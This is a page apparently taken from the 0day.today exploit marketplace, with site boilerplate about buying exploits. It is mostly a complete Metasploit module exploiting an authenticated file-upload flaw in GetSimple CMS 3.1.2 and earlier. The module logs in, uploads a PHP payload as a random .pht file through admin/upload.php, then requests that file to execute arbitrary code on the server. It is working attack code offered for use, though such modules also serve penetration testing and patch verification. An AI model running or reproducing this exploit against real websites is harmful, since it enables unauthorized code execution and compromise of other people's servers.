0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GetSimpleCMS PHP File Upload Exploit
[##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'GetSimpleCMS PHP File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability in GetSimple CMS. By abusing the
upload.php file, a malicious authenticated user can upload an arbitrary file,
including PHP code, which results in arbitrary code execution.
},
'Author' =>
[
'Ahmed Elhady Mohamed'
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '25405'],
['OSVDB', '93034']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Generic (PHP Payload)', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 04 2014'
))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to GetSimplecms', '/GetSimpleCMS']),
OptString.new('USERNAME', [true, 'The username that will be used for authentication process']),
OptString.new('PASSWORD', [true, 'The right password for the provided username'])
], self.class)
end
def send_request_auth
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, "admin", "index.php"),
'vars_post' => {
'userid' => "#{datastore['USERNAME']}",
'pwd' => "#{datastore['PASSWORD']}",
'submitted' => 'Login'
}
})
res
end
def send_request_upload(payload_name, cookie_http_header)
data = Rex::MIME::Message.new
data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")
data_post = data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, "admin", "upload.php"),
'vars_get' => { 'path' =>'' },
'cookie' => cookie_http_header,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post
})
res
end
def check
res = send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, 'admin', 'index.php')})
if res && res.code == 200 && res.body && res.body.to_s =~ /GetSimple CMS.*Version\s*([0-9\.]+)/
version = $1
else
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version #{version} found")
if Gem::Version.new(version) <= Gem::Version.new('3.1.2')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Authenticating...")
res = send_request_auth
if res && res.code == 302
print_status("#{peer} - The authentication process is done successfully!")
else
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
print_status("#{peer} - Extracting Cookies Information...")
cookie = res.get_cookies
if cookie.blank?
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
print_status("#{peer} - Uploading payload...")
payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht'
res = send_request_upload(payload_name, cookie)
if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</
upload_path = $1
print_good("#{peer} - File uploaded to #{upload_path}")
register_file_for_cleanup(payload_name)
else
fail_with(Failure::Unknown, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_raw({
'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name),
'method' => 'GET'
}, 5)
end
end
# 0day.today [2024-12-26] #